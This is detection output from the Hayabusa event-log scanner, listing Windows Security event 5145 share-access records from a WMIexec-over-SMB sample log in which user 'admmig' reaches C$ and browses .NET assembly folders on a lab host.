10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 
